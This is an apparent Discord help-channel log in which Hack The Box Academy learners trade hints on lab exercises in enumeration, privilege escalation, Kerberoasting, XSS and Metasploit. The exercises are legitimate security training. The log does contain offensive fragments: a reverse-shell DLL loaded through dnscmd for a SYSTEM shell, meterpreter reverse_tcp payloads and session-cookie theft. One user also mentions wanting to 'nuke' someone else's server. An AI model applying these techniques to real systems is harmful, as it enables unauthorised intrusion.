#modules
Not everyone learns at the same rate.
But honestly, network technologies are absolute basics that you should really master. Without these basics it will be damn difficult to understand other things.
If u want to become a hacker asap then spend all the time on this
It’s also just totally okay to not fully understand everything at once and just come back to it tomorrow
i understand most of it, but some of it just makes no sense like kerberos and the ticket things. these last 5 sections
cryptography i get actually
I just search in google "rbash escape"
and the first 2 sites i checked showed how to escape
If you google "escaping rbash" the solution is shown in both the first two links displayed
same
but he gets mad because I told him I just searched in google for that exercise lol
"NUUU you kant yoose guguru to sulve problum"
"yuu mush tell meh ansser!"
lol
well yall aint wrong, 2nd top result for me
it's a whole ass article with clearly defined steps and examples.
Anybody have a moment to give a pointer on the last DNS question in the Footprinting module? I’m running out of ideas.
whats the question ask and whatchu tried
Host 203?
You need to find all zones
I don't have notes for that
I’ve been through all the wordlists in my seclists Discovery/DNS folder without much luck hunting for a subdomain with a particular last octet. I’ve found one zone so far. Thanks much guys. That should tide me for now.
but if I remember well u had to enumerate subdomains of the subdomains
DNSeption
https://academy.hackthebox.com/module/67/section/637 Windows Privilege Escalation -- Skills Assessment I -- Find the password for the ldapadmin account somewhere on the system. -- I got the foothold, and I am root already, I have done all the questions except that one. Any hint?
delete that, u telling the answer
Look for non default software and that might lead you somewhere
What's the difference between a client-server Infrastructure and a one server Infrastructure
they seem like same thing
this skills assessment turned out to be a lot more difficult than i thought it'd be
great way to put everything in module to use
has anyone done the restricted shell portion of linux priv esc? been working on it for a little bit now and I'm stuck. anyone with a hint?
im a bit confused on the web server pivoting with the rpivot module. I am doing it exactly as the steps in the module suggest, but the webserver cannot be reached through my proxychains. any tips?
im also unable to interact with the 172.16.5.0/24 network in general through the proxychains with rpivot
nvm i think i fixed it my kali has /etc/proxychains4.conf and i renamed it /etc/proxychains.conf and it seems to now work with rpivot
i am stuck at privilege escalation : https://academy.hackthebox.com/module/77/section/844
my progress so far : got to user2, got the flag. Generated ssh key, can't put it to /root/.ssh/authorized_keys (access denied), and despite the fact I left password empty, it still asks for password when I try to ssh using it to either user2 or root at a remote. I'm clearly doing something wrong, but can't figure out what
getting its indigenous /root/.ssh/id_rsa key also results in nothing since it asks for a password for the key anyway (which I obviously do not know)
Footprinting Lab - Medium, I got the flag but cheated because I looked up the SQL query for HTB password. Now I'm trying to understand how that SQL query worked. Can someone point me in the right direction to understanding it?
Can I get some help with logrotate section of "Linux privilege escalation" module?
I've been trying to get a reverse shell for an hour and have made sure to follow the steps correctly.
I'm stuck at the "using web proxies - burp intruder" section.
I just wanna know if im in the right path here:
any way to find the CLSID to run juicypotato?
have you checked the lists on github that were created for specific operating systems?
I am trying to run all these shits https://ohpe.it/juicy-potato/Test/
Don't know about that but a few moons ago I had used the following:
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
did you find a way to loop through a list of CLSIDs and test them one by one?
Can I ask u how u got it?
whatever I try I can't get it to work
I looked it up but I had learned about that when I was doing a HTB machine, I don't remember what it was but the tool I used was either printspoofer or juicypotato and I had to specify the CLSID with the -c argument. I had to try a few of them until one worked, I believe I followed a pattern but I don't remember it. Unfortunately, I don't have notes on that subject.
I think I got it
I just needed to modify a bit the .bat file code
Does this automate the process of looping through CLSIDs, cause I might need that for another project?
yea I did it following this
yea i got it
anyone?
please explain your question more
I am going back over the Server Side Attack module. on the SSTI exploitation Example 2, can anyone help me figure out to get output using the terminal commands? I can get the flag using tplmap but was hoping to do it manully as well. Thanks!
Sure! I'm supposed to "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag". So i'm using the intruder to send the payload .html on /admin and it's returning 403 forbidden, so i tried to change the user agent and host to see if anything changes and i receive a random 200 ok, but the .html is still forbidden
This was addressed in an erratum #858470491676737536 message
The problem was that the payload in the cheatsheet gave an exit status 0 (success), but not the actual output we want
I just need a hint or something, i'm really stuck lol
have you made sure you are requesting with the useragent you are setting up in burp, maybe test via something like curl ?
yep, i think the problem is my request
GET /§admin§/ HTTP/1.1
User-Agent: Apache/2.4.41 (Ubuntu)
Yeah that is what I was getting as well, I take it, it has not been fixed then. Thanks for the info!
You could try the modified payload suggested, it worked for me
I guess it helps to read the post! Thank you very much, that does appear to work!
Hi guys, i'm stuck on the password mutation section of the password attacks module.
I am trying to find the password for the user sam but trying hydra over ftp with the mutated list created from the resources provided will take like 2 hours. is there a way to speed it up or does anyone have some hints?
i am also using the flag -t 48 if that helps
hey guys, ive been on the pentesting path today. i'm currently in the web enumeration section. when i started the part of running gobuster dns it had gotten super slow. i figured I needed to respawn the target, and i did. but then that takes forever, longer than normal. i closed the VPN, logged out, logged back in and when i went to spawn the target, it was showing this weird ip address. I respawned again, and it gave me a different weird ip address. anyone know whats up with this??
Is there a reason you're running gobuster against a domain name instead of the actual ip and port they gave you?
nvm I found what module you're in, the weird ip is normal on this one.
The final assessment on that one is so weird and seems unrelated to the module...
I am going through the Introduction to windows command line module, in the skill assessment section I find it very hard to ssh to the remote server, I checked my internet and VPN connection and everything seems good on my end.
Is anyone having the same sluggish sshing?
Can someone explain the difference. I'm really not getting it. have googl'd and gpt'd but still can't see the difference
Client-server is an umbrella term that refers to any case where many clients ask a server to respond with stuff.
The "one server" depicted on the right is one case of setting up client-server architecture. In that case, you're keeping one or more webapps, a database, etc. all on the one server. This works when the amount of traffic you're handling is small, but when you need to handle more people, that's when you get multiple servers and databases and all of that mess going on.
Ok I see. so the difference is that you don't necessarily keep the web application and database on the same server with the client-server model?
Yes. Client-server is just a general networking concept, the other examples in that module cover different ways of setting up web application infrastructure
ok thanks
basically theyre not mutually exclusive models
Hey, if I'm struggling with one of the academy modules exercises, would this be the place to ask for help?
Is there a common/easy reason for my nmap scans to be missing ports that are open in a box walkthrough?
I think you did it earlier in the module
It’s in the hint in one of the previous sections, but you need to use custom.rule to mutate that hint
Earlier in the module, not this section
So you start taking notes 😄
I do need help with this one:
been trying for an hour at least lol
I can enumerate all the ports with their services and versions, I tried using netcat to connect with imap and pop3
Good luck with that 😄
trying to use tcpdump to see if something pops up as in the lesson but no luck
Taking notes on everything is very helpful
Are you sure? It should be in the hint of one of the previous sections
nothing pops up, which I think I'm either not using tcpdump correctly, or just missing something 😦
Believe me it’s worth taking notes. If you do it now you won’t forget during exam
I used to do the same as you and it annoyed me as well
Anyone have any ideas? I’ve tried several scan types and I can only find them if I specifically target the range of the ports that are being missed
ok I figured out thanks to reddit but honestly, that exercise is misleading in many ways
I'm doing it right now, and while I've answered the first hunt, I'm stuck on the second hunt
I did, but am stuck on the second question for the skills assessment, did you have any luck?
can you help me
Attacking Common Applications - WordPress - Discovery & Enumeration
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
Used curl, checked the source, but i cant find the correct answer. I know it is noted in the source but I'm looking for something wrong, can anyone give me a hand?
interact with the blog
Sorry, that does not help me any further.
Found it in the blog section. Thanks!
The whole point is password cracking. Taking notes on pwned users is super helpful, as it's good practice in live engagements as well
It can be done without an email client
can anyone help footprinting lab hard, I cannot ssh into the machine
||im getting the error Connection closed by 10.129.11.163 port 22||
Can anyone help me Intentions machine
can no longer access machines through browser using windows+subsystem?
this is using the UDP vpn, using tcp completely breaks it for both subsystem + windows
can you paste the command in spoiler tags? Otherwise dm me, it's up to you
changed it sorry
That's not quite what they meant
Your error message seems to indicate that the system you're trying to ssh into may be down
Try resetting target and trying again
Hi, I'm stuck on the question from "vulnerability assessment" in HTB academy: "What is the name of one of the accessible SMB shares from the authenticated Windows scan?" I've accessed the Nessus and authenticated Windows scan provided on the HTBs VM, but have no idea where to look for it and how to find it... Been trying since yesterday. How do I find the accessible SMB shares?
Can someone help me in encrypting the .cap file which is converted to .txt using john the ripper
Sorry thats decrypting
I suppose your server is paid
?
This channel is for assistance specifically with the learning modules found at https://academy.hackthebox.com
What do you mean by "thing" the search for vulnerability?
what is lirc nessus
I did search for smb there and it didn't help..
Iirc meaning if I recall correctly, and "thing" meaning search for smb in the search bar. I don't recall having much difficulty with this module so my memory on this is spotty as I found it boring
ok, I'll keep trying..
Also using pwnbox, hit the full screen button its much nicer than doing it from the tiny window
I found a solution for "Escaping Restricted Shells" in "LINUX PRIVILEGE ESCALATION" module.
It rather looks like workaround but it fits into "think out of the box" idea.
PM me if anyone interested.
yes, you're right. didn't know it was possible. I found the share!! 😄
I mean a lot of stuff is intended
The better solution is using your own vm but that dives into personal preference
Hello everyone!
In my attempts to figure this out, i stumbled upon this server 😄
Has anyone experienced issues with copying and pasting text from Windows to a VMWare Virtual Machine running HTB Pwnbox?
It works, but weirdly. I guess only one time per boot 
Click the clipboard icon/button
SQL Injection Fundamentals - Subverting Query Logic, the target wont spawn
Unless you are referring to the "htb edition" of parrot which is not the same as pwnbox
oh, alright. Yes, i do
Try http://ip:port
Read the zsh configuration shown in the section above to find what command is mapped to 'll'. Submit the command as the answer. Can anyone help me out?
I tried
It didnt work
So I tried with another section, it didnt work
cat .zshrc
I tried but how do i find what command is mapped to ll
How do you pipe output to another command
Then using a command that will grab and repeat the line that has a specific string
Hi guys there is an error in module 109 section 1035. The good answer is "&" and it accepts only the wrong answer "new-line"
Numbers mean absolutely nothing
What is the module and section name
If you truly believe it to be an error: post it in #858470491676737536
Thanks
There is a pinned template to use to submit feedback there
Hi in Pivoting, Tunneling, and Port Forwarding - SOCKS5 Tunneling with Chisel
what version of chisel can I use in my kali and target to complete module ?
The module should have some hints or have told you how to get there @misty flower
If you've located an error in a module, the #858470491676737536 channel is the spot to post it to get it fixed. They do a great job addressing issues.
module: attacking common applications --> WordPress --> Perform user enumeration against http://blog.inlanefreight.local. Aside from admin, what is the other user present?
How to enumerate the users? In the module they only use manual ways, is this the correct way and should i guess/fuzz the other account? Or did i miss something to find usernames (other than the blog, the name there does not work "A WordPress commenter".
check wpscan out, theres a flag to enum users
tried that, no user results.
what is your command looking like?
sudo wpscan --url blog.inlanefreight.local --enumerate u
looks pretty similar to what I did, tho I used ||--enumerate as well as specifying an API key||
Done that too, same results as the user enumeration.
Which version of Metasploit is free and can be used only through a CLI? - my answer is "Metasploit Framework" but prompt says its incorrect..
why it's incorrect ??
feel free to dm me with the output you got, maybe that helps in understanding what went wrong.
which section is that?
Think about the way to start MetaSploit
USING THE METASPLOIT FRAMEWORK - INTRODUCTION TO METASPLOIT
thank you!!
Have fun 🙂
ah yeah now I remember the question 😄
A few reboots of the instance did the job. Got the usernames with the same command as stated earlier.
module: attacking common applications --> WordPress --> Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.
I've enumerated with sudo wpscan --url blog.inlanefreight.local --enumerate u (found user:doug), bruteforced the password. Logged in, enumerated users again (wp-admin + xmlrpc) but no extra accounts, in the adminpanel there are only 2 users known.
or should i compromise the rhost first and find the user there?
How would i go on to find the count of these records?
How come, they are seen as 1 object but I cant count them
I just used count for each of the tables and added them together, idk if its cheating but meh lol
Sus
hi guys im stuck on this skills assessment the last couple days im getting i dont have permission to view this resource. by far the hardest one so far
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 167.172.54.11 Port 32652</address>
</body></html>
any help would be greatly appreciated its the file upload one.
please help information gathering web skills assessment 3rd question I ran this but didn't see server name :curl -I "http://i.imgur.com"
HTTP/1.1 403 Forbidden
Date: Wed, 05 Jul 2023 12:13:08 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset="UTF-8"
Content-Length: 0
Via: HTTP/1.1 forward.http.proxy:3128
Connection: keep-alive
question Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?
the module teaches u how to get the source code
i have the source code and im doing a get request to the directory with the date in front of name
and thanks for the reply
it is a hard skills assessment
by far the hardest i know im at the last step its like im missing admin permissions
Did you successfully upload?
but the source code will give u all the necessary to bypass all
i did
Because this is not the right one
that is the response that i was expecting to run the shell
but instead says i dont have access to the uploaded photos but i uploaded loads with the intruder beforehand
If you successfully uploaded with the right extension and magic bytes, you will successfully be able to upload and execute
Probably not the correct ones then
if u got the source, u have alll the info there to be able to exploit the target
Hey there, quick question.. as far as you know is it possible to do modules and stuff on an Android tablet?
i tried on android but the vm wouldnt start an instance for me
ill have another read maybe im using wrong magic bytes or something im so close like literally last step close
.
ill try in repeater instead of intruder
why u trying it in the intruder
that is to find the bypasses with brute forcing
all u need is in the source code
it fuzzes the file names in the get method with the command ls to see if any of my uploaded files respond
Try using whatweb, have a look at the cheat sheet for that module
I used intruder as well tbh
attempt 27896534 hope it works
i got a fresh jpg and im getting slightly bigger byte responses now when uploading photo
thanks so much guys
tell you one thing after this struggle i am most certainly not a master of upload exploitation
@zinc marsh just ping me if they continue.
https://academy.hackthebox.com/module/67/section/603 - I cannot get this command to run with Powershell run as admin or command prompt running as admin either -
I assume the DNSadmin exploit is to get a system shell so I can read the flag?
Is this the channel to ask for help
It seems like in the first part of the section you add your user to the DNS admin group and then toward the end compile the C code to get a reverse shell as system? Did anyone else have issues with this section. I am doing everything exactly as instructed running the command as admin but some commands are not working.
Still have a medium integrity. SO, I run cmd as admin but I can't run the reg query......
i got some problems on the logrotate section in the linux privesc module
i dont get the right log file
Check the Userfolder
how do I add HTB academy role?
like /usr or the htb user?
bc i tried every logfile in the htb-student folder
Go into your settings via the academy platform
No, like /home
Then I can ask for help?
Okay I did that part, are there instructions in a discord channel to get the discord role?
Do you have a Silver annual subscription?
I think you can have the HTB Academy User role only if you have a silver year subscription
how can i scan the subdomains with aquatone?
I have a student subscription
No, the student subscription is not the same.
As far as I know, only subscribers to the Annual Silver Subscription have been able to get this role.
am doing that
OKay thanks
I don't know, the tool was released in 2019 and the last release is from 2019. maybe the tool doesn't work anymore?
nvm I had to add http:// with the subdomain
the list was with only the subdomains
Anyone know why this doesn't work? Isn't the point to get system? I am a member of the DNSadmins group but I can't read the flag nor can I run the command in my screenshot with CMD running as admin
Is the goal in this section to get a system shell?
reg query is wrong
Proceed exactly as shown in the module.
Okay, all I did was change the ip to the machine ip I was working on. Here is what happens when I run it per the module -
Here is from the module -
No worries I get the concept. Can I propose an update to the module. All I had to do is make a reverse shell as an msfvenom dll and added it with dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll. then restarted the dns service and spawned a system shell. The point being that DNS services runs as system and if you're a member of that group "DNSadmins" you can potentially spawn a system shell. I believe that's what the module is trying to explain?
Maybe I'm misunderstanding you, but that's exactly what the module shows. What exactly do you want to change?
You can post any change request in #858470491676737536
ah never mind, thanks for your help. I digress.
Was it a tablet or Android mobile device though?
Which module?
This question?
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
I'm trying to do the IDOR in Insecure APIs section and the "Update Profile" button isn't clickable. I've had a similar issue in a previous section where I couldn't click on the Documents button... I just had to keep refreshing the IP til I could. Have yall run into something similar here?
this looks like a path issue
the file you've put the hash in is not accessible at the path you've specified
But you have Kira's password
so hashcat is not reading it correctly
Are you using a VM or the PwnBox?
did you escape the hash?
since it contains $, you will need to escape it on the command line
also your rule doesn't look like it's going to work
" in theory but i think both may work depending on your shell
You must first complete Credential Hunting in Linux
using pwnbox
doesn't appear to be escaping properly
When I click the button, there is an alert
But it works without problems.
Is it possible that your browser in which you run the PwnBox blocks something?
I had a similar problem on a previous section in this module, and after a few refreshes, it worked with no other changes on my end. The browser in the VNC doesn't block anything. It doesnt even show theres a link there to me. It's bizarre
I guess I'll just come back to it later
I'm sorry, I can't help you any further.
Maybe you try it with your own VM?
Actually, it doesn't even need a VM, it's a Docker container that you can access directly from your PC. Try it like this.
I'm more so saying this here to say that this issue is existential, should someone search it wondering the same
@west canopy Can you take a look at it?
For me in the PwnBox it has worked now, but obviously there are difficulties.
characters in your hashes seem to be getting escaped
It is a password attacks module. Means you have to crack the password 😉
save the hashes to a file and try cracking them.
He doesn't have to crack this hash at all. A few sections above he gets the password from Kira
can i pm someone about command injections - skill assessment ?
It is encrypted
Ahhhh
sure
Attacking Enterprise Networks -- Web Enumeration & Exploitation -- I think I found the IDOR
someone I could ask for sanity check?
sure
You need to use custom.rule on that pass to get a mutated list of that word
hey friends, i am at Active Directory Enumeration & Attacks - Kerberoasting - from Linux, for 1st Question i am trying this, how to solve this, or am i doing something wrong?
Have you checked to make sure that the IP you're passing is actually the IP of the domain controller?
oh ok, its an attack host
but still dont get how to use GetUserSPNs without creds
oh i got it 🥲 😂 that was sneaky
If you use Rubeus on a domain joined computer, you can technically Kerberoast without creds
Because the credentials are stored in your session
A question for the class.
I'm working through the file transfers module, and most of the module is a list of commands. With that kind of learning material, do you power through and look back to it as a reference, or is a better strategy to drill memorization?
you'll only use a handful of those file transfer methods.
only occasionally do a couple fail due to restrictions and you'll have to find a workaround.
you don't need to memorize what they are tbh
mostly you'll just be setting up a python web server and sending a get request
Thank you for your help. I find myself getting caught up in trying to internalize every detail. 😅
Just take notes of it and refer back to them when you need them, you’ll start memorizing them as you use them more often
or get a tool that records your past commands used
find / -name notes.zip 2>/dev/null
Try this
it tells you ur locatedb is outdated.
run updatedb then use locate command again.
or yeah, use find command instead
oh ur in a box
if it's not ur host vm, usually you don't want to use locate to find files as either the command doesn't exist, or the locatedb is outdated (like u experienced).
You'd want to use the find command as suggested.
hey everyone;
Can anyone help me I am stuck on the HTB Academy module of Reverse Shell & Payloads - The live engagement Host-1. I tried to deploy the shell file through the upload file directory but when I try to execute the file it shows me 404 not found.
does anyone know about it?
could use a hand. stuck on active directory enumeration/dcsync section. i have enumerated the user that has the "reversible encryption option". User is 's*nc**n' . I have confirmed that he has those rights with powershell/powerview. How do i go about finding his cleartext password. I can't use secretsdump.py because the jump host is a windows machine. i try to use mimikatz but it gives an error. feels like i'm missing something dumb. thanks.
Try following steps similar to this: ||https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/||
just saw the note in the beginning of the chapter about 'secretsdump.exe'. ill go investigate that. should be good for now
hello guys
"Another possibility is to exclude specific results. For this, the option "-v" is used with grep. In the next example, we exclude all users who have disabled the standard shell with the name "/bin/false" or "/usr/bin/nologin"."
i do not understand this
There are users on Linux for whom the shell has been disabled.
what does shell disabled mean
+why i cannot send photos
They can't log in through a terminal.
read #welcome
ok i understand this
but i do not know the main method of "grep -v", is grep for selecting text only?
i'm trying to use getuserspns_windows.exe but it keeps saying that i am providing it too few arguments. here is my command. PS C:\Tools> .\GetUserSPNs_windows.exe -target-domain INLANEFREIGHT.LOCAL -dc-ip 172.16.5.5 -request-user INLANEFREIGHT\syncron -request
AD enum/DCsync section
ok thanks
i'm having a hard time googling an example of that command
anyone here has finished the Footprinting module?
on Oracle TNS i have tried to install odat.py multiple times but still it doesn't work. can you provide me with the answer as long as its the last question i need to finish the module please?
still nothing :/
Traceback (most recent call last):
File "/home/******/Documents/Tools/odat/odat.py", line 5, in <module>
from libnmap.parser import NmapParser
ModuleNotFoundError: No module named 'libnmap'
You need to run the tool from it's directory
Also follow the instructions given in the section
as you can see i am on its own directory
also tried to use it as " python3 odat.py all etc "
still nothing
Like I said the section gives an installation script
It's possible it wasn't installed properly
i downloaded via script and then from github
Why both?
one on my os and one in VM coz i thought something might be wrong
from Pwnbox doesnt work
can someone pm plz
asking again. thanks. i'm trying to use getuserspns_windows.exe but it keeps saying that i am providing it too few arguments. here is my command. PS C:\Tools> .\GetUserSPNs_windows.exe -target-domain INLANEFREIGHT.LOCAL -dc-ip 172.16.5.5 -request-user INLANEFREIGHT\syncron -request. what am i missing? hard time finding an example online
Hey guys can anyone help me on the thick client application exploit please, I can not work out what I'm doing wrong when trying to download the server
i do not understand what is AWK
you can google the documentation for awk but in this example it's used to display text in a certain format, this being the first and last result of a string
ok thanks
Stuck on XSS - Phishing XSS module.
Is there anyone free I can shoot a DM to?
just post the problem and what you've tried here
https://academy.hackthebox.com/module/163/section/1544 ATTACKING ENTERPRISE NETWORKS -- Web Enumeration & Exploitation -- Steal an admin's session cookie and gain access to the support ticketing queue. Submit the flag value for the "John" user as your answer. -- I have the cookies but I cannot log in with them
how are you using the cookie to login
I just modified it with cookie editor
and also tried from here
I've created the URL as taught through the module. I enter it to test it and I'm getting only half of the payload completed, the other half is written underneath as "');document.getElementbyId('urlform').remove();">
I'm more curious as to what am I doing wrong for the command not to be fully functioning?
You might just need to troubleshoot where quotes are being placed and what characters are actually ending up where
It's been months since I did the XSS module, but I vaguely remember having to mess with a few things?
Haven't even finished the path and don't plan to take the exam right now lol
I just wanted to do all of the Windows stuff on Academy because Windows privesc and certain aspects of AD were becoming a weak point
I have like 5-6 modules to go but if I take the exam after that I’ll get my ass handed to me😂
any one else have trouble with the RDP and SOCKS Tunneling with SocksOverRDP module question? I keep having issues trying to do the command regsvr32.exe SocksOverRDP-Plugin.dll
nvm had to make sure win defender wasnt deleting it
I thought you were doing that module blind😌
lol
I got a payload to read /etc/passwd but I am not able to find the flag :/
What you show in the image is not Java, it's a very basic XSS payload.. aka html with a bit of JS in the "onerror" parameter
The server knows nothing as it's inanimate, but its members maybe do.. anyway, what is with that question?
can anyone help me with lfi module? I can't do this task "Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt"
yea sorry i was using javascript at the beginning
then I moved to xml
anyone?
bruh I finally got it, I was struggling with the easiest one lol
i am in this section in linux fundamentals
If I remember correct, you have to try different wordlists. One of them will hit, but I do not remember which.
I discovered the parameter and I did a fuzzing in the Server Files
so why this questions is hard
difficulty is subjective to ur knowledge
yes i had the same problem yesterday
how u solved it?
i used my own machine
I am on my own machine lol
now it's working for some reason
hi everyone, i am in the lab easy common services, i found the hash of fiona in the mysql database and i want to know if it's useful for the rdp service. Moreover, i want to know if it's normal that there is an "*" at the beginning of the hash. TY
Well try it out
i tried pth but no result
Have you tried cracking it?
Has anyone completed the newly updated "Linux privilege escalation" module?
I am stuck on 2 sections and I just can't figure it out
not yet, i have seen the "*" at the beginning of the hash, is it normal ?
i think some of the qs expect u to google things and find out. you wont necessarily learn enough in that section to solve the question
So far I have not faced any module like that.. even though there were times when you had to rely on resources not directly talked about on HTB, they were always mentioned in the module.. what module have you met that didn't provide you with the necessary info to deduce the answer to questions?
This ofc assuming you have reviewed the module description before starting it and looked for the prerequisite modules, which is right at the end of the description and above "relevant paths"
i think some of them teach you the basics about something and then give a question where they expect u to research a lil more to find out the answer
Have you read and understood all the text above the questions?
lemme find an example
like this one https://academy.hackthebox.com/module/18/section/74
Thank you i got it
💪
@analog dock how are u going with the path?
Like 5-6 to go
u gonna do the exam after finishing?
or u will do pro labs and machines?
I won’t do machines
Maybe a pro lab
Probably just go through the modules another time and take good notes
Then probably spend some extra time in ad and web parts
I am trying to do the attacking enterprise networks blindly and it is being hard
I’m not surprised
If I go for the exam straight after the course I will get destroyed lol
I got stuck a lot doing it blind too
yea me too lol
one part I honestly dont know how youd figure out doing blind
So dont feel bad if you have to cave a little
I am doing the monitoring.inlanefreight.local part rn
and I am stuck again lol
oh I thought that part was easy 😂
foothold portion of monitoring?
yea
the easy part was the flag in gitlab 
yea i got it
I feel like you don't necessarily have to be able to do all of 'attacking enterprise networks' blind, but you should at least be able to get to domain admin.
That's all that really matters, to show that you understand the material.
the one log part I dont see how you could known blind unless you just already knew it was a thing
Hi guys, I'm stuck on the question of the Credential Hunting in Linux, I got a shell with kira and got the passwd.bak file in will's /home/.backups but I can't transfer shadow.bak, I tried to crack Firefox passwords of kira using the tool suggested in the module but it gives a python error, maybe because the box is using python 3.8 instead of python 3.9.
Someone has a hint?
if the file can be read it can be transferred
follow the section
That is deducible and requires no googling at all
In order to know what command to execute to run a http server just start typing "http" in the terminal and as taught to you by some previous section use TAB to see what autocomplete suggestions you have
From the 2 suggestions, you will immediately understand that the command you have to run is http-server.
In order to run the server on the port the question asks you to you'll have to use the correct argument, which you still don't know
So, again, as taught in the previous sections, just type -h after a command in order to know the different arguments
Doing http-server -h you find out that the correct argument to use is -p or --port followed by your port number
The question specifically tells you: "use the short argument to specify the port number".. so it's clear that you'll have to use -p as the answer
Congrats, you got your answer using only things you've learned in that module alone
Okay, i will try again from start
u found the shadow.bak already
just follow what it says in the section
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ this website explains some methods for full tty if someone wanna save it
for now the first machine is being easy
Hey I don't understand how I can retrieve the admin hash in the hard lab of the common services module. I'm stuck on the last question, I'm connected to the database and I have impersonated a user. I found a linked database and I'm stuck here
can someone help me pls
ok smarty pants not everyone is big brain like u
Ive never used http-server
didn't realize that was preinstalled
I usually use a python module
i was too scared to use this because what if someone finds a way to hack you and get access to your entire file system
got it
hello everyone, is there someone who has done the Using the Metasploit Framework module? I'd like to ask something
I'm stuck with Sessions & Jobs section
I established a meterpreter session in the target but can't escalate privileges with the sudo exploit
I'm receiving this error message once I try to establish a meterpreter
[-] Msf::OptionValidateError The following options failed to validate: SESSION
[*] Exploit completed, but no session was created.
any hint, help, stone.....!!!! whatever
it only works for the directory and subdirectories you're currently in. If you're concerned create a new folder and transfer the files you want to serve over to that before running.
its also mostly just a lab exercise thing. In the real world youd be staging a more robust server
and you're saying there is no way a hacker can get into other directories from this
I will never say no way
could be a bug in the http module as unlikely as it is
you could end up putting sensitive stuff yourself in there that could mess things up to
ect
Most people arent going to waste time trying to target other people in a lab
and you should be doing things from a VM so even if you do get pwned you just reset the VM no biggie
whats the best vm to download
kali or parrot
which is the .asp shell which uses username and password instead of IP
It ultimately doesnt matter and is mostly preference. That said kali is industry standard and Just Works Tm
I don't get which of the steps I've showed you would you consider complicated enough to call me big brain for doing them.. it's just reading the sections and actually understanding them.. also, I would suggest you to mind your own language.. I am not your friend to be called names, there has to be respect as per rules of the server
Okay but as the resident jackass here you could stand to be less of one yourself
Somehow I'm being a jackass when asking for respectful replies, ok.. makes perfect sense
I'm sorry to hear that, how come?
You were the jackass first with your condescending as fuck answer to their question.
also how thin skinned do you gotta be to get offended at 'smarty pants'
Yes, it is indeed a myth.
Having done the module, it's basically a bunch of metaphysical nonsense disguised as some sort of pep talk.
If your argument is basically "if you work hard at something you'll probably eventually be able to do it", then I don't really disagree.
But so many of the examples given are just dubious.
And then there's some really funny phrasing, like "the official definition of a question"
I am glad academy mostly sticks to pentesting, lol.
I think you haven't paid much attention to what happened, because despite you mentioning it, there is no question they've made at any point in our conversation.. in fact it all started with them giving an arguably wrong answer to somebody else, saying that some questions can't be answered with the knowledge of the module alone
I have disputed that and they offered to provide an example in support of the argument.. they provided me said example and I have explained step by step how someone could answer it with the sole help that module provided.. well, until here it's all good, we were just having a normal conversation.. then I just get called names
Tbh I am not offended, it's just that I don't know about you but I would rather not be called that for no reason by some stranger.. hence I asked them to be more respectful
I'd sort of disagree with your given example, since there's no direct connection between http-server and npm.
The linux fundamentals module is honestly not that good. It sort of jumps all over the place,
It's a free module, so I'm not complaining too much about it, but it's sort of hard to sell you on the training if the free modules are poor,
what are you on about? I see the outputs pretty similar
He meant the pkzip and pkzip2
Personally it doesn't matter, just crack it.
oops looks like i need sleep or i need coffee
Nah it's not ur fault
It's literally the same hash
I personally wouldn't care and just try cracking it.
could it be due to how zip2john works on kali as opposed to parrot (even though the hash is the same)
Could be, maybe version diff or the os being diff changes smthn
yo @thorn urchin have you done the exploit Thick-Client from Attacking Common Applications? i just wrote a quick walkthrough if you want to have a look? it could be useful for helping others but it's a tier 2 module so of course i can't share it publicly
anyone done the Web Service & API Attacks module? I want to discuss the last skill assignment cause i think i got the flag in the wrong way.
sure shoot me a dm
Have you tried the mutated wordlist or a different wordlist like rockyou
I mean according to the ss you've only done the loveyou mutation list
Also try using john instead of hashcat
actually you can share that one! Just re-lable it as a Fatty walkthrough segment 😉
also the section seem like the box official writeup (almost 1 to 1)
Looks like it's failing bc of the (2)
I mean some people said they fared better by watching ippsec's video on the box
i did and his video is so good for debugging some of the stuff but his video and other writeups are trying to get RCE but the section needs you to get an admin account to access ipconfig or something
The error it gives you
Also you should be making the mutated wordlist from the command given in the "password mutations" section
For Submit the contents of the flag.txt file on the Administrator desktop on MS01 in the AD Enumeration & Attacks - Skills Assessment Part I, I have chisel setup on the web shell and attempting to use proxychains to setup evil-winrm, but how do i know which internal host IP to use? i ran a nmap scan which said all ports were up
Again, read what I said
grab the hash from the workstation as you have already generated it and crack it
if anyone is willing to help it would be much appreciated, stuck here for hrs now
I'm extremely stuck on the INTRODUCTION TO NOSQL INJECTION module section "In-Band Data Extraction" please help!
You'll need to enumerate that. Scanning over proxychains can be a little scuffed depending on how you have it set up and what your nmap flags are, so it might be more reliable to do a ping sweep from the internal host to get a better idea.
Did you follow the hint and urlencode your payload?
I have created a golden ticket for the DC01 in the AD Enumeration & Attacks - Skills Assessment Part I and am unable to ls the C$ directory? I have run klist and the Kerberos ticket is in memory
I am getting a cannot find path error
I am working from the MS01 machine in an RDP session
dm you
Hi, I'm working on the Using the Metasploit Framework module and I'm getting the message
Exploit Completed but no session was created
How do I fix that
I'm using a Kali Linux virtual machine
I need help please
Which section?
And can you please provide more information
The very first exercise on the Metasploit Framework module
Psexec?
Yes
Okay, check out the payload on show options please
I almost thought it was a troll since they talked about myths in the two paragraphs before stating that Einstein was bad at math lol. But I mean, even if it might not be factual, it was still an alright module
Sometimes windows/meterpreter doesn't work, you have to put the x64 payload there
some server ripped my friends server off that hes been working really hard on by taking everything hes said and putting it on his own
im trying to nuke the server
🧍♂️
I don't care, it's illegal
How can I do that
but not illegal
I liken it to those "motivational speakers" who just spout a bunch of garbage to make you feel good.
Set payload (here's the payload itself)
I believe it's windows/x64/meterpreter/reverse_tcp
So is that the command to type or what ?
I don't think there's really anything wrong to tell people about the 10000 hour "rule" if it was some sort of private conversation meant to motivate a person, but for a published module it's pretty disappointing.
Can I dm you ?
Yeah
Yeah, I agree
